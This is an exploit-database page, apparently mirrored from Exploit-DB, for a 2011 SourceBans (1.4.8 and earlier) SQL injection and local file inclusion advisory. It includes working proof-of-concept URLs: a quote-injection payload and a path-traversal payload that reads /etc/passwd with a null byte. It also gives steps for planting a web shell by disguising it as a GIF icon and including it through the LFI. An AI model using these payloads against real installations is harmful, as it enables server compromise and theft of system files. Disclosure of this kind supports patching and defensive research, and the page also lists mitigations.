header-logo
Suggest Exploit
vendor:
SourceBans
by:
Havok
7.5
CVSS
HIGH
SQL Injection & LFI Injection
89, 22
CWE
Product Name: SourceBans
Affected Version From: <= 1.4.8
Affected Version To: <= 1.4.8
Patch Exists: Yes
Related CWE: N/A
CPE: SourceBans
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

SourceBans <= 1.4.8 SQL/LFI Injection

SourceBans is a free global administration and banning system for Source engine based servers. SQL Injection can be exploited by appending ' to the URL which will result in an SQL error. LFI Injection can be exploited by authenticating as root administrator or as somebody who is able to change the SourceBans theme and appending '../../../../../../../../../../etc/passwd%00' to the URL. There is also a possibility to get a shell by adding 'GIF89a' at the very beginning of the shell, renaming it to h4x0rz.gif and uploading it as an icon in the admin panel.

Mitigation:

Update to the latest version of SourceBans, use a web application firewall, and ensure that all input is validated and sanitized.
Source

Exploit-DB raw data:

# Exploit Title: SourceBans <= 1.4.8 SQL/LFI Injection
# Date: Dec. 6th 2011
# Author: Havok
# Software Link: http://www.sourcebans.net/
# Version: <= 1.4.8

"- What is SourceBans?
SourceBans is a free global administration and banning system for Source engine based servers."

Vulnerabilities:

1°) SQL Injection:
Proof of concept: http://1m-4-1337-m8.c0m/index.php?xajax=RefreshServer&xajaxargs[]=1' <=== SQL Error w00t!

2°) LFI Injection:
Only works when you're authentified as root administrator or as somebody who is able to change the SourceBans theme :
Proof of concept: http://server/index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00

Note: There is also a possibility to get a shell by adding "GIF89a" at the very beginning of the shell,
renaming it to h4x0rz.gif and uploading it as an icon in the admin panel. Then include the file with the LFI and G4M3 0V3R :).

=> In memory of crashfr who will NEVER die. Merci pour tout mec! ;-))... R.I.P.

./EOF

Navigation

Suggest Exploit

Services By CQR